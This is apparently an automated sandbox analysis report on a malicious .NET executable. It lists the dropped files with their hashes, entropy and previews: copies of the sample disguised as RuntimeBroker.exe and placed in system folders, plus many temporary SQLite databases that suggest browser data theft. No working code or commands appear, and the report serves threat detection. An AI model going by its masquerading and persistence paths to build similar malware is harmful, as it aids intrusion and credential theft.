                                          MD5:3C9CF0B38226E2A7F0191A0130536859
                                          SHA1:87D531257A15E18B50FA341BCE9AC3C5A71BA80D
                                          SHA-256:4AC2DDB4FA2D1917AE491B5AC623E7EBF23E5E34667C63E5ACD433CC6696C23D
                                          SHA-512:AD6BC0C26B6ADBB7EAD5DB17FB4FD4285BCFD623531F41AD6AE31E97A1E760A59F36DE05EAB0E298E0892FEA03D4A4C2AE389D90036C784EDB44E61D7A8161D2
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 68%
                                          Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                          C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          C:\Program Files\Windows Portable Devices\557bb37d3fa657

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with very long lines (457), with no line terminators
                                          Category:dropped
                                          Size (bytes):457
                                          Entropy (8bit):5.840142183311164
                                          Encrypted:false
                                          SSDEEP:6:O6jJl2Q2tEmIjtuuXPGhHkNpRL9HYUU5KOBKbBGo2blGbkTrCPFXkTlTpTP6tnbg:PjJDJmIwbczLJUiIQbkCtXaJxPGZpPAh
                                          MD5:51F18D5D2A7D5798E733808187B7E3AB
                                          SHA1:DA191CF5F5E01A653727B6073602C18D2D76A2C9
                                          SHA-256:152621A4C2E12F228934FAFC6C8AE97555ADB2499C2D83F428CC7AC1A70F4F75
                                          SHA-512:F87F81FF0CD138627F1AE4FE60624B8AFF60B815F56C9C0E1953F8227046141AA16F9E8B3E67E6B320C43C64DBFCA99BB7ADD71009CB955420F9C6656DF7BD89
                                          Malicious:false
                                          Preview:IHTm4u7PrZYWA3YgBjR8rugw1a0TsyLG3c7pwQL8nqgdm85UppAzgNuYlgue3nh3OSdh6tuuYTUBOCJ2egoCxWkpsjDPfqEAJmPUfXY65PaN2tKjW29W8eG1ryzWpePrOU1lwzXHIsGh5Wx8Ye2nrrBogYmrhBRbAt9h1iwhf2OQXi5VB07KllAgTMFYMqjHbphMXPH0rVHydvR7cRqrDGzYscOodYUzSHyrBt7vtHcPeMDi5H6492DV0Ie5AcXTASfW6k6tT476nj4gYqtVcZzaDd12OCuRuJPLqrlVKNkF5HrQN7gUsB1ldFSdsDeRJpLeUt0rFYKOytf6wlpRfaisRnslYHmGsT6P5M5eHyPU1mwtjWrHYNvtGdNqAOS7vDffxPAkpLJrKO1p19BCafsfhMIc8Od2fRixGR5TVHcNDEi1mizBMQhQVA7kHilarQL2qEikD

                                          C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                          Category:dropped
                                          Size (bytes):3511394
                                          Entropy (8bit):7.993950820060533
                                          Encrypted:true
                                          SSDEEP:49152:uGmcpg5vS+c8OorsMzNRK6v1hFXefh0iMB+0b+N/uyVbVihyXYuIS:t0vfxoEe6vHFXgh5cb+NhqlS
                                          MD5:3C9CF0B38226E2A7F0191A0130536859
                                          SHA1:87D531257A15E18B50FA341BCE9AC3C5A71BA80D
                                          SHA-256:4AC2DDB4FA2D1917AE491B5AC623E7EBF23E5E34667C63E5ACD433CC6696C23D
                                          SHA-512:AD6BC0C26B6ADBB7EAD5DB17FB4FD4285BCFD623531F41AD6AE31E97A1E760A59F36DE05EAB0E298E0892FEA03D4A4C2AE389D90036C784EDB44E61D7A8161D2
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 68%
                                          Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                          C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:false
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                          Download File
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe7db24f5, page size 16384, DirtyShutdown, Windows version 10.0
                                          Category:dropped
                                          Size (bytes):1310720
                                          Entropy (8bit):0.4221682173686186
                                          Encrypted:false
                                          SSDEEP:1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
                                          MD5:F61D2B434652E5093CDB51BC9184DB51
                                          SHA1:3604EDC7C980165E983F04DE793E7B3A5970C3F4
                                          SHA-256:CCA283C3720D495A48D208B412D2154ED9BAD75DC2F91927AED24F63BF9BA159
                                          SHA-512:D5AB37DA4C71E257EF61AD6BC1A10FA5E1F0E5C03B90273E6955DA5310946BB73299063B3CF00AB648EC643B0E81AE111778DD0B99A2C8F2546DBFDC8345F032
                                          Malicious:false
                                          Preview:..$.... .......A.......X\...;...{......................0.!..........{A......|=.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................q........|9...................N......|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                          C:\Recovery\9e8d7a4ca61bd9

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with very long lines (458), with no line terminators
                                          Category:dropped
                                          Size (bytes):458
                                          Entropy (8bit):5.827946673543157
                                          Encrypted:false
                                          SSDEEP:12:NA11T5byCuCho6EFZacMwrYsOIt0cC3y8c0SL8J6Ur4Jgej:45yCRPsafid2e88U02ej
                                          MD5:EDD6571F68D200AD1E4EB7B4E96CA36B
                                          SHA1:B8FB92E163AC97DBC860B1C8BB14EB3EBA398F04
                                          SHA-256:E3DC7422E012FC76E6AF0A93055144F8B3E0CE036F86497B6475A9E59B1D3087
                                          SHA-512:E13D9992E24AE2D8DF386D051593F450EF7BE1593FB04D83330A1FF0BDCDAF92FC4FF60ADCAE23A53D708DAB27F78B313664A359FFCAB8BAC4016407D5C401AF
                                          Malicious:false
                                          Preview:fb0PDnDSuBRwSV8aNMIRM02pQiFLDMoGsnKVzMab6RIptiX7lBoPXKPojL9ei1OiXLEoLmlBvrV5sN6sLIjBhYsiYfwoM52ECjShdsv9amdqyT6WPRTaSNA8cfQp07z0zR3I4YOcWkk55CtEjaY5lbwyjTE7bGIdxn1hayb0D1ErmFDawMFai4OXeEikTQAPbHHRLMnv8i2uXELeQoLPAs43ZdCWP0hw0yPf7vPjiUbACd9a2EUoEvPsMO2rKRgHAF3jyqhfZmqqR415emdKg2sFjhSs3hZQyT97jalMhyPbEibSX6NhyVlHWyARXyl1Na2744WEARnrnQBAF9V6U1ccs2kvaUysMXOoqdYdkIhgr3eGw9LYdphV7ZPCTkoqd4fPBXTll1WLU6uzXe8aIZPh02qQOWJ9e0CxYPEZqjwlSVBBpaozmNiDo7YIqCWPsXqd37aIZi

                                          C:\Recovery\RuntimeBroker.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                          Category:dropped
                                          Size (bytes):3511394
                                          Entropy (8bit):7.993950820060533
                                          Encrypted:true
                                          SSDEEP:49152:uGmcpg5vS+c8OorsMzNRK6v1hFXefh0iMB+0b+N/uyVbVihyXYuIS:t0vfxoEe6vHFXgh5cb+NhqlS
                                          MD5:3C9CF0B38226E2A7F0191A0130536859
                                          SHA1:87D531257A15E18B50FA341BCE9AC3C5A71BA80D
                                          SHA-256:4AC2DDB4FA2D1917AE491B5AC623E7EBF23E5E34667C63E5ACD433CC6696C23D
                                          SHA-512:AD6BC0C26B6ADBB7EAD5DB17FB4FD4285BCFD623531F41AD6AE31E97A1E760A59F36DE05EAB0E298E0892FEA03D4A4C2AE389D90036C784EDB44E61D7A8161D2
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 68%
                                          Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                          C:\Recovery\RuntimeBroker.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\84JufgBTrA.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1915
                                          Entropy (8bit):5.363869398054153
                                          Encrypted:false
                                          SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4vb
                                          MD5:B3D8CC65029ED629D3371F6862D653E0
                                          SHA1:9D3D093780ABCE0D0DC0CDCE5EBE8E77BCEDC621
                                          SHA-256:83F3CDA23DB0E9B53FDDA654446707DDE6F92D4566938AE499471C701F88C245
                                          SHA-512:3ED07C087E69A317D904D2E73E024B561AF2B92F273B30CB9B748D3B4D20B502CC32322EDA60F46A4AAE5A030FBBE3C39F73A06BC5415DC26BFCF59273CFC7BF
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MaEiPrsQRasQLtRzJjb.exe.log

                                          Download File
                                          Process:C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):1281
                                          Entropy (8bit):5.370111951859942
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

                                          Download File
                                          Process:C:\Recovery\RuntimeBroker.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):1281
                                          Entropy (8bit):5.370111951859942
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):1.1510207563435464
                                          Encrypted:false
                                          SSDEEP:3:Nlllullkv/tz:NllU+v/
                                          MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                          SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                          SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                          SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                          Malicious:false
                                          Preview:@...e................................................@..........

                                          C:\Users\user\AppData\Local\Temp\07mQC2qkqc

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\0M4XhYTC5r

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\0TKuPc1E7j

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\1XGn5c1HpS

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\1XquzIm2yn

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\239f1iyBT2

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\2K9MWTe8qK

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\2WdYOWgh5d

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
